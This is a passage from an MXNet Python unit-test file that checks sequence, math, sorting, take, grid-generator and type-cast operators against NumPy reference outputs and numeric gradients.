return np.moveaxis(rarray, 1, axis)
def check_sequence_func(ftype, mask_value=0, axis=0):
# bind with label
xpu = default_context()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@pytest.mark.skip(reason="Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len=None
use_sequence_length=False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev._bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
else:
bound = rev._bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test._bind(default_context(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test._bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
mathematical_core("hypot scalar",
lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape).astype('float32')
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp <= 0.6, [1], [0]) * np.where(data_tmp >= -0.6, [1], [0])])
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
x = sym_func(shape=shape, dtype=dtype)
exe = x._bind(default_context(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0], np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out)
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s._bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0], np.array([0,1,2,3,4]))
def test_arange_like():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
axis_list = [0, -1]
for sh in shape_list:
for axis in axis_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0, axis=axis)
np_out = np.arange(start=0, stop=sh[axis])
assert_almost_equal(nd_out.asnumpy(), np_out)
def test_arange_like_without_axis():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
for sh in shape_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0)
np_out = np.arange(start=0, stop=val.size)
assert_almost_equal(nd_out.asnumpy(), np_out.reshape(sh))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
test_arange_like()
test_arange_like_without_axis()
def test_order():
ctx = default_context()
def gt_topk(dat, axis, ret_typ, k, is_ascend):
if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
for i in range(5):
for j in range(5):
for k in range(5):
ret[i, gt_argsort[i, :, j, k], j, k] = 1
return ret
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, rtol=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
for dtype in [np.float16, np.float32, np.float64]:
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(dtype)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, rtol=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5, is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
is_ascend=False)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b._simple_bind(ctx=default_context(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0], a_npy)
exe.backward() # No error if BlockGrad works
def test_take_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad)
@pytest.mark.parametrize('mode,out_of_range', [
('clip', True),
('wrap', True),
('raise', False)
])
@pytest.mark.parametrize('data_ndim', range(1, 5))
@pytest.mark.parametrize('idx_ndim', range(1, 4))
def test_take(mode, out_of_range, data_ndim, idx_ndim):
def grad_helper(grad_in, axis, idx):
if axis == 0:
if axis == len(grad_in.shape) - 1:
grad_in[idx] += 1.0
else:
grad_in[idx, :] += 1.0
elif axis == 1:
if axis == len(grad_in.shape) - 1:
grad_in[:, idx] += 1.0
else:
grad_in[:, idx, :] += 1.0
elif axis == 2:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, idx] += 1.0
else:
grad_in[:, :, idx, :] += 1.0
elif axis == 3:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, :, idx] += 1.0
else:
grad_in[:, :, :, idx, :] += 1.0
elif axis == 4:
grad_in[:, :, :, :, idx] += 1.0
else:
raise ValueError("axis %d is not supported..." % axis)
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result._simple_bind(default_context(), a=data_shape,
indices=idx_shape)
data_real = np.random.normal(size=data_shape).astype('float32')
if out_of_range:
idx_real = np.random.randint(low=-data_shape[axis], high=data_shape[axis], size=idx_shape)
if mode == 'raise':
idx_real[idx_real == 0] = 1
idx_real *= data_shape[axis]
else:
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape + (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()), dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
if out_of_range and mode == 'raise':
try:
mx_out = exe.outputs[0].asnumpy()
except MXNetError as e:
return
else:
# Did not raise exception
assert False, "did not raise %s" % MXNetError.__name__
assert_almost_equal(exe.outputs[0], np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
if mode == 'clip':
i = np.clip(i, 0, data_shape[axis])
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'], grad_in)
def test_grid_generator():
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid._simple_bind(ctx=default_context(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0]
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'], grad_est)
# check addto
exe = grid._simple_bind(ctx=default_context(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'], grad_est + grid_grad_npy)
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid._simple_bind(ctx=default_context(), flow=(1,2)+target_shape, grad_req='write')
# check forward
exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'], grad_est, rtol=1e-3)
# check addto
exe_add = grid._simple_bind(ctx=default_context(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
assert_almost_equal(exe_add.grad_dict['flow'], grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_context())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_context(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r, data.asnumpy()[np.arange(n), x.asnumpy()])
def test_cast():
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y._simple_bind(ctx=default_context(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
assert exe.outputs[0].dtype == dsttype
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_context()))
assert_almost_equal(exe.outputs[0], X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0], X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
def get_cast_op_data():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
# Test requires all platforms to round float32->float16 with same round-to-nearest-even policy.
def test_cast_float32_to_float16():
input_np = np.array(list(get_cast_op_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
def check_cast(op, input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float32)
sym = op(x, dtype=np.float16)
ctx = default_context()
exe = sym._bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
exe.forward(is_train=True)
assert exe.outputs[0].dtype == np.float16
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
check_cast(mx.sym.Cast, input_np, expected_output)
if default_context().device_type == 'gpu':
check_cast(mx.sym.amp_cast, input_np, expected_output)
def test_amp_multicast():
if default_context().device_type == 'cpu':
return
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res._bind(ctx, {'x': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx),
'y': mx.nd.random.uniform(shape=(3, 3), dtype=np.float32, ctx=ctx),
'z': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
out1, out2, out3 = exe.outputs
assert out1.asnumpy().dtype == np.float32
assert out2.asnumpy().dtype == np.float32
assert out3.asnumpy().dtype == np.float32
def check_amp_multicast(input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
